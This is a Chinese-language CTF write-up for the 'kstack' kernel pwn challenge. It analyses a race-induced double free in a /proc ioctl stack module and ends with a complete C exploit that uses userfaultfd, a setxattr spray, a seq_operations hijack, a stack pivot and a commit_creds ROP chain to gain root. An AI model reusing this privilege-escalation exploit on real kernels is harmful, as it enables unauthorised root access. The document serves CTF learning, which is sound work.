    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr quiet" \
    -cpu kvm64,+smep \
    -net user -net nic -device e1000 \
    -monitor /dev/null \
    -nographic

开启 kaslr, smep, 没有 smap.

init:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, loads kstack.ko and hands
# an unprivileged shell to the player.
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# Attach stdin/stdout/stderr to the console.
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

ifup eth0 >/dev/null 2>/dev/null

# Limit kernel pointer and dmesg exposure.
echo 2 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# The flag is readable by root only.
chown root:root flag
chmod 400 flag
# Load the vulnerable module and open its /proc/stack entry to everyone.
insmod /root/kstack.ko
chmod 777 /proc/stack

echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
cat /root/banner
# Interactive shell running as uid 1000.
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0 -f

kstack.ko 只实现了 ioctl:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
// List node as recovered in the decompiler; field names are the analyst's.
struct Node
{
  int task_860;   // value read from current_task + 860 when the node is pushed
  char pad[4];
  char data[8];   // 8-byte payload copied from/to user space
  Node *next;     // next (older) node in the singly linked list
};

// Decompiler output for the ioctl handler of /proc/stack.
//
// a2 selects the command: 0x57AC0001 pushes 8 bytes from user_data,
// 0x57AC0002 pops 8 bytes to user_data. Nodes are tagged with the value found
// at current_task + 860 (the write-up identifies it as the pid), and a pop
// only returns a node carrying the caller's tag.
// No locking is visible anywhere in this function.
// Returns 0 on success or for an unknown command / empty list, -22 on failure.
__int64 __fastcall proc_ioctl(__int64 a1, int a2, __int64 user_data)
{
  int v4; // r12d
  Node *v5; // r13
  Node *next; // rbx
  Node *node; // rbx
  Node *v9; // rax

  v4 = *(_DWORD *)(__readgsqword((unsigned int)&current_task) + 860);
  if ( a2 == 0x57AC0001 )
  {
    // Push. The write-up identifies kmalloc_caches[5] as kmalloc-0x20.
    node = (Node *)kmem_cache_alloc(kmalloc_caches[5], 6291648LL);
    node->task_860 = v4;
    // The node is linked into the list before its data is copied in, so it is
    // reachable by a concurrent pop while the user copy is still pending.
    v9 = head;
    head = node;
    node->next = v9;
    if ( !copy_from_user(node->data, user_data, 8LL) )
      return 0LL;
    // Copy failed: unlink and free the node again.
    head = node->next;
    kfree(node);
    return -22LL;
  }
  else
  {
    if ( a2 != 0x57AC0002 )
      return 0LL;
    // Pop.
    v5 = head;
    if ( !head )
      return 0LL;
    if ( v4 == head->task_860 )
    {
      // The data is copied out before the node is unlinked and freed, so the
      // node is still on the list while the user copy is pending.
      if ( !copy_to_user(user_data, head->data, 8LL) )
      {
        next = v5;
        head = v5->next;
        goto LABEL_12;
      }
    }
    else
    {
      // Walk the list for the first node carrying the caller's tag; v5 trails
      // one node behind `next`.
      next = head->next;
      if ( next )
      {
        while ( next->task_860 != v4 )
        {
          v5 = next;
          if ( !next->next )
            return -22LL;
          next = next->next;
        }
        if ( !copy_to_user(user_data, next->data, 8LL) )
        {
          v5->next = next->next;
LABEL_12:
          kfree(next);
          return 0LL;
        }
      }
    }
    return -22LL;
  }
}

差不多是单向链表实现的一个栈, 只不过数据会存一个 current task 偏移 860 位置的值. 调试一下可以知道是进程 pid. 故 pop 操作的逻辑是根据 pid 去找到当前进程先前 push 进去的.

node 从 kmalloc-0x20 中取, 并且没有加锁. push 和 pop 操作中都有 copy_from_user / copy_to_user, 那么可以让第一次 pop 卡在 kfree 前, 再 pop 一次, 造成 double free. 然后 open stat, 此时 freelist 中的第一个 object 就是 seq_operations. 再 push 并卡住, 此时已经写完了 task pid, 但是还没写 data. 这时 pop 读取到的是 seq_operations + 0x8 处的数据, 即可 leak kernel base.

模块没有提供写操作, 这里就用 setxattr + uffd 堆占位进行 UAF 写, 覆盖 seq_operations->start, 然后通过 read 劫持 rip.

由于没开 smap, 所以可以观察寄存器, 然后把栈迁移到用户页面上, 并提前布置好 ROP 链. 调试一下, 可控的寄存器似乎只有 rax, rbx, rcx, r9 (read 的第三个参数). rax 是 rip, rbx 和 rcx 太小, 无法 mmap 到, 也找不到合适的 gadget 把栈迁移到 r9 上. 所以使用 xchg eax, esp 这种 gadget. 需要注意的是, 这条 gadget 的地址低位可能不是 0 或者 8, 虽然简单的指令对 rsp 的对齐没有要求, 但是后续 ROP 会调用一些函数, 说不定会崩溃. 所以最好找到地址低位是 0 或者 8 的 gadget. 如果没有, 也可以找 xchg eax, esp; ret imm16; 这种, 低位 + imm16 = 0 / 8 的也行, ret 之后 rsp += imm16 就对齐了.

(或者直接找 mov esp, imm32; ret, imm32 对齐, 这种 gadget 也行, 还更方便)

还需要注意的是, kmalloc-0x20 的 freelist 被破坏了 (设置成了 seq_operations->start 的默认值 single_start, 是个函数地址), 而起 shell 又会从中申请, 所以在返回用户态后我们需要想办法把 freelist 填充一下, 这样就不会申请到非法地址了. 可以在最开始 open 几个 stat file, 起 shell 前 close 掉, 把一些 seq_operations 填充进去.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
// musl-gcc exp.c -static -masm=intel -g -o exp -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/xattr.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <linux/userfaultfd.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <sched.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <semaphore.h>

/*
 * kernel_offset is filled in by the fault handler once the leak succeeds and
 * is added to every gadget address in pwn(). The other three values are not
 * referenced by the code in this listing; presumably they are the default
 * x86-64 layout bases kept for convenience - confirm before relying on them.
 */
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

/*
 * Write "<ESC>[<color>m<ESC>[1m[<tag>] <msg><ESC>[0m" to stderr.
 *
 * Formatting straight into the stream means the message length is not bounded
 * by any intermediate buffer.
 */
static void log_colored(const char *color, const char *tag, const char *msg) {
    fprintf(stderr, "\033[%sm\033[1m[%s] %s\033[0m", color, tag, msg);
}

/* Print msg in bold green, prefixed with "[+] ". No newline is appended. */
void success(const char *msg) {
    log_colored("32", "+", msg);
}

/* Print msg in bold red, prefixed with "[x] ". No newline is appended. */
void fail(const char *msg) {
    log_colored("31", "x", msg);
}

/*
 * Print msg in bold blue, prefixed with "[*] ", but only when the program is
 * built with DEBUG defined; otherwise this is a no-op.
 */
void debug(const char *msg) {
#ifdef DEBUG
    log_colored("34", "*", msg);
#else
    (void)msg;
#endif
}

/*
 * Format "<hint>: 0x<var in hex>\n" and hand it to one of the printers above.
 *
 * print_handle: printer that receives the formatted line.
 * hint:         label placed in front of the value.
 * var:          value printed in hexadecimal.
 *
 * The line is sized with a first snprintf() pass, so a long hint cannot
 * overflow the buffer. Nothing is printed if formatting or allocation fails.
 */
void printvar(void print_handle(const char *), char *hint, size_t var) {
    int len = snprintf(NULL, 0, "%s: 0x%zx\n", hint, var);
    if (len < 0)
        return;

    char *buf = malloc((size_t)len + 1);
    if (buf == NULL)
        return;

    snprintf(buf, (size_t)len + 1, "%s: 0x%zx\n", hint, var);
    print_handle(buf);
    free(buf);
}

/* User-mode register values captured by save_status() and placed at the end of the ROP chain. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current cs, ss, rsp and rflags in the globals above.
 *
 * The assembly is written in Intel syntax, so the file has to be built with
 * -masm=intel (see the build line at the top of the file).
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    /* Align the saved rsp down to 16 bytes, then add 8, so it looks like the
     * stack pointer right after a call instruction. */
    user_sp &= ~0xf;
    user_sp += 8;
    debug("Status has been saved.\n");
    printvar(debug, "cs", user_cs);
    printvar(debug, "ss", user_ss);
    printvar(debug, "rsp", user_sp);
    printvar(debug, "rflags", user_rflags);
}

/*
 * Landing routine in user space: spawn a shell if the process is root.
 *
 * Never returns. The process always leaves through exit(), with status 0
 * after the shell ends or -1 when the uid is still non-zero, so it terminates
 * normally instead of running into a segmentation fault.
 */
void get_root_shell() {
    success("Backing from the kernelspace.\n");

    if (getuid() == 0) {
        success("Successful to get the root. Execve root shell now...\n");
        system("/bin/sh");
        exit(0);
    }

    fail("Failed to get the root!\n");
    exit(-1);
}

/* ioctl command numbers understood by /proc/stack (see proc_ioctl). */
#define PUSH 0x57AC0001
#define POP  0x57AC0002

/*
 * fd: /proc/stack; seq_fd: the /proc/self/stat descriptor whose read() is
 * hijacked; fill_seq_fd: stat descriptors opened up front and closed right
 * before the shell is spawned.
 */
int fd, seq_fd, fill_seq_fd[0x100];
/*
 * Gadget and symbol addresses before the KASLR offset is applied; the values
 * are specific to the kernel image of this challenge. The first one is an
 * "xchg eax, esp; ret 0x148d" gadget, as the name says.
 */
size_t xchg_eax_esp_ret_0x148d = 0xffffffff81370f93;
size_t pop_rdi_ret = 0xffffffff81034505;
size_t prepare_kernel_cred = 0xffffffff81069e00;
size_t commit_creds = 0xffffffff81069c10;
size_t push_rax_pop_rdi_ret = 0xffffffff81458e3e;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81600a4a;

/* Affinity mask shared by every caller of set_cpu(). */
cpu_set_t cpu;

/*
 * Restrict the calling thread to one CPU.
 *
 * id: index of the only CPU left set in the global mask `cpu`.
 *
 * The mask is rebuilt from scratch on every call. The result of
 * sched_setaffinity() is not inspected.
 */
void set_cpu(int id) {
    CPU_ZERO(&cpu);
    CPU_SET(id, &cpu);

    /* A pid of 0 addresses the calling thread. */
    sched_setaffinity(0, sizeof cpu, &cpu);
}

/*
 * Put [addr, addr + len) under userfaultfd supervision and start a monitor
 * thread for it.
 *
 * addr:    start of the range to watch.
 * len:     length of the range in bytes.
 * handler: thread routine; it receives the userfaultfd descriptor cast to
 *          void *.
 *
 * The range is registered for missing-page faults only. Any failure is
 * reported on stderr and terminates the process: without a working
 * registration none of the PUSH/POP/setxattr calls on the watched pages would
 * block and the exploit would fail silently.
 */
void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api = { .api = UFFD_API, .features = 0 };
    struct uffdio_register uffdio_register = {
        .range = { .start = (unsigned long) addr, .len = len },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    pthread_t monitor_thread;
    long uffd;
    int err;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0) {
        perror("userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* The API handshake has to precede any other ioctl on the descriptor. */
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
        perror("UFFDIO_API");
        exit(EXIT_FAILURE);
    }

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
        perror("UFFDIO_REGISTER");
        exit(EXIT_FAILURE);
    }

    /* pthread_create() returns the error number instead of setting errno. */
    err = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (err != 0) {
        fprintf(stderr, "pthread_create: error %d\n", err);
        exit(EXIT_FAILURE);
    }
}

/*
 * User-space landing routine of the ROP chain: closes all 0x100 descriptors
 * stored in fill_seq_fd, then hands over to get_root_shell().
 */
void fill_freelist_and_getsehll() {
    int *slot = fill_seq_fd;
    int *const end = fill_seq_fd + 0x100;

    while (slot != end) {
        close(*slot);
        slot++;
    }

    get_root_shell();
}

/*
 * userfaultfd monitor thread of the kstack exploit.
 *
 * arg: the userfaultfd descriptor cast to void *.
 *
 * pwn() touches the three watched pages in order, so the faults arrive as:
 *   0 - POP into the first page,
 *   1 - PUSH from the second page,
 *   2 - setxattr() reading across into the third page.
 * While a case below runs, the faulting call in the main thread stays
 * blocked. Each fault is finally resolved with UFFDIO_COPY from `page`.
 */
static void *fault_handler_thread(void *arg) {
    static int fault_cnt = 0;
    char *page = malloc(0x1000);
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;
    set_cpu(0);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        read(uffd, &msg, sizeof(msg));
        printvar(success, "fault count", fault_cnt);

        switch (fault_cnt++) {
            case 0: {
                /* Second POP while the first one is still blocked before its
                 * kfree(): per the write-up the same node ends up freed twice. */
                ioctl(fd, POP, page);
                break;
            }
            case 1: {
                /* The blocked PUSH has linked its node but not yet written the
                 * data, so this POP returns the 8 bytes already stored at
                 * offset 8 of the object. */
                size_t stop;
                ioctl(fd, POP, &stop);
                printvar(success, "stop", stop);
                kernel_offset = stop - 0xffffffff8113be80;
                break;
            }
            case 2: {
                /* The gadget swaps eax and esp, so the new stack is the low 32
                 * bits of the gadget address: map that area in user space.
                 * NOTE(review): the address is only a hint (no MAP_FIXED) and
                 * the mmap() result is overwritten on the next line. */
                size_t addr = xchg_eax_esp_ret_0x148d & 0xffffffff;
                size_t *rop = mmap((void *)(addr >> 12 << 12), 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
                /* Return address popped by the gadget's own "ret 0x148d". */
                rop = (size_t *)addr;
                *rop++ = pop_rdi_ret;
                /* The chain continues 0x148d bytes further up. */
                rop = (size_t *)(addr + 0x148d);
                *rop++ = pop_rdi_ret;
                *rop++ = 0;
                *rop++ = prepare_kernel_cred;
                *rop++ = push_rax_pop_rdi_ret;
                *rop++ = commit_creds;
                *rop++ = swapgs_restore_regs_and_return_to_usermode;
                *rop++ = 0;
                *rop++ = 0;
                *rop++ = (size_t) fill_freelist_and_getsehll;
                *rop++ = user_cs;
                *rop++ = user_rflags;
                *rop++ = user_sp;
                *rop++ = user_ss;
                /* Per the write-up, this read() goes through the overwritten
                 * start pointer of the stat file's seq_operations. */
                read(seq_fd, page, 0xdeadbeef);
                break;
            }
        }

        /* Resolve the fault so the blocked call can continue. */
        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

/*
 * Run the kstack exploit from the main thread.
 *
 * Each of the three pages of `buf` is watched by userfaultfd and is touched
 * by exactly one kernel copy below; the matching case in
 * fault_handler_thread() runs while that copy is blocked.
 * No return value of the calls below is checked.
 */
void pwn() {

    /* Descriptors closed again by fill_freelist_and_getsehll(). */
    for (int i = 0; i < 0x100; i++)
        fill_seq_fd[i] = open("/proc/self/stat", O_RDONLY);

    fd = open("/proc/stack", O_RDWR);
    void *buf = mmap(0, 0x3000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    /* One node on the stack so that there is something to pop. */
    ioctl(fd, PUSH, "Wings");

    set_cpu(0);
    register_userfaultfd(buf, 0x3000, fault_handler_thread);

    /* Fault 0: copy_to_user() into the first page blocks this POP. */
    ioctl(fd, POP, buf);

    seq_fd = open("/proc/self/stat", O_RDONLY);
    /* Fault 1: copy_from_user() from the second page blocks this PUSH; the
     * handler computes kernel_offset meanwhile. */
    ioctl(fd, PUSH, buf + 0x1000);
    printvar(success, "kernel offset", kernel_offset);
    xchg_eax_esp_ret_0x148d += kernel_offset;
    pop_rdi_ret += kernel_offset;
    prepare_kernel_cred += kernel_offset;
    commit_creds += kernel_offset;
    push_rax_pop_rdi_ret += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;

    /* The value occupies the last 8 bytes of the second page, which is
     * already populated; the remaining 0x18 bytes of the 0x20-byte setxattr
     * value lie in the third page, so the kernel copy blocks (fault 2) after
     * the first qword. */
    size_t *hijack = buf + 0x2000 - 0x8;
    *hijack = xchg_eax_esp_ret_0x148d;
    setxattr("/exp", "Wings", hijack, 0x20, 0);
}

/*
 * Entry point: installs get_root_shell as the SIGSEGV handler, records the
 * user-mode register state and then runs the exploit.
 */
int main(void) {
    signal(SIGSEGV, get_root_shell);

    save_status();
    pwn();

    return 0;
}